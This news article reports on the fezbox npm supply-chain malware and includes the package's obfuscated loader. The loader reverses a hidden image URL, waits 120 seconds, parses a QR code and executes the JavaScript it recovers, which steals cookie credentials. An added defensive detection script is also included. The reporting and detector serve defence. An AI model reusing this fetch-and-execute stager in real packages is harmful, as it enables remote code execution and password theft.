Cyber Security News

New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code

A sophisticated malware campaign has emerged in the npm ecosystem, utilizing an innovative steganographic technique to conceal malicious code within QR codes.

The malicious package, identified as “fezbox,” presents itself as a legitimate JavaScript/TypeScript utility library while secretly executing password-stealing operations through a cleverly disguised QR code payload.

This attack represents a significant evolution in supply chain threats, demonstrating how cybercriminals are adopting increasingly creative methods to bypass security measures and evade detection systems.

The fezbox package masquerades as a comprehensive utility library offering TypeScript support, performance optimization, and modular functionality.

According to its documentation, the package provides common helper functions organized by feature modules, allowing developers to import only necessary components.

While the README file mentions a QR Code Module for generating and parsing QR codes, it deliberately omits crucial details about the package’s capability to fetch QR codes from remote URLs and execute embedded malicious code.

Image of the QR code (Source – Socket.dev)

Socket.dev analysts identified the malware after detecting suspicious behavioral patterns within the package’s codebase.

The security team discovered multiple layers of obfuscation techniques, including string reversal, code minification, and the novel use of steganographic QR codes to hide the final payload.

At the time of discovery, the malicious package remained active on the npm registry, prompting Socket.dev to petition the npm security team for its immediate removal and the suspension of the threat actor’s account.

Advanced Steganographic Payload Delivery

The malware employs a sophisticated multi-stage execution process that begins with environmental checks and timing delays to evade sandbox detection.

The initial malicious code contains browser-specific conditionals that verify the presence of window and document objects, ensuring execution only occurs in legitimate browser environments.

When conditions are met, the malware waits 120 seconds before initiating the payload retrieval process.

The core malicious functionality revolves around a reversed URL string that conceals the location of the steganographic QR code:

(function () {
    // Bail out in development builds or when the c.chance(2 / 3) check fires;
    // n, c and d are helpers defined elsewhere in the package.
    if (n.isDevelopment() || c.chance(2 / 3))
        return;
    // Wait 120 seconds (120 * 1e3 ms) before fetching the payload.
    setTimeout(async () => {
        const loader = new d.QRCodeScriptLoader();
        // The string literal is stored reversed; un-reversing it yields the image URL.
        const t = await loader.parseQRCodeFromUrl(
            "gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yrani"
            .split("")
            .reverse()
            .join("")
        );
        // Execute the JavaScript recovered from the QR code.
        loader.executeCode(t);
    }, 120 * 1e3);
})();

When reversed, this string resolves to a Cloudinary-hosted QR code image containing the final malicious payload. The QR code itself serves as a steganographic container, hiding JavaScript code that extracts username and password values from browser cookies.
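As an added example (not code from the fezbox package, Socket.dev or this article), the following script performs a static triage of a package's source for the traits described above: it decodes string literals obfuscated with .split("").reverse().join(""), flags decoded values that look like URLs, evaluates constant setTimeout delays such as 120 * 1e3 without eval, and notes dynamic code execution. The sample input is constructed with a placeholder URL; the parseQRCodeFromUrl and executeCode names are those in the snippet above, and the regular expressions are heuristics, not a JavaScript parser.

```javascript
// Added example (not fezbox or Socket.dev code): static triage for the staged
// loader pattern above: decode strings reversed via .split("").reverse().join(""),
// flag URL-like results, report long setTimeout delays, note dynamic execution.
// Match <quote>literal<quote>.split("").reverse().join("") across whitespace.
const REVERSE_IDIOM =
  /(["'`])((?:\\.|(?!\1)[^\\])*)\1\s*\.split\(\s*(["'])\3\s*\)\s*\.reverse\(\)\s*\.join\(\s*(["'])\4\s*\)/g;
// Loose "looks like a URL or hostname" test applied to the decoded string.
const URL_LIKE = /^(?:https?:\/\/)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:\/\S*)?$/i;
// Delay argument following a callback body, e.g. "}, 120 * 1e3)". Heuristic only.
const DELAY_AFTER_BODY = /\}\s*,\s*([0-9.e\s*]+)\)/g;

function findReversedStrings(source) {
  const findings = [];
  for (const m of source.matchAll(REVERSE_IDIOM)) {
    const decoded = [...m[2]].reverse().join("");
    findings.push({ obfuscated: m[2], decoded, urlLike: URL_LIKE.test(decoded), offset: m.index });
  }
  return findings;
}

// Evaluate constant products like "120 * 1e3" without eval; keep delays >= threshold.
function findLongDelays(source, thresholdMs = 60000) {
  const delays = [];
  for (const m of source.matchAll(DELAY_AFTER_BODY)) {
    const ms = m[1].split("*").map(Number).reduce((a, b) => a * b, 1);
    if (Number.isFinite(ms) && ms >= thresholdMs) delays.push(ms);
  }
  return delays;
}

function assessPackageSource(source) {
  const reversed = findReversedStrings(source);
  const delays = findLongDelays(source);
  const dynamicExec = /\.executeCode\(|new Function\(|\beval\(/.test(source);
  // All three traits together mirror the staged loader described in the article.
  const suspicious = reversed.some((r) => r.urlLike) && delays.length > 0 && dynamicExec;
  return { reversed, delays, dynamicExec, suspicious };
}

// Constructed sample in the shape of the fezbox loader; the URL is a placeholder.
const SAMPLE = `(function () {
  setTimeout(async () => {
    const t = await loader.parseQRCodeFromUrl(
      "gnp.daolyap/moc.elpmaxe.ndc//:sptth".split("").reverse().join("")
    );
    loader.executeCode(t);
  }, 120 * 1e3);
})();`;
console.log(JSON.stringify(assessPackageSource(SAMPLE), null, 2));
```

Run over a package's bundled entry point (for instance a dist/index.js), a result with suspicious set to true is a cue for manual review rather than a verdict, since each check on its own also matches benign code.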

Once decoded, the payload attempts to locate cookies containing authentication credentials, specifically searching for “username” and “password” fields using additional string obfuscation techniques.

The extracted credentials are then exfiltrated through an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

This multi-layered approach – combining environmental evasion, timing delays, string reversal, steganographic concealment, and credential extraction – represents a sophisticated evolution in npm-based supply chain attacks that security teams must prepare to defend against.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
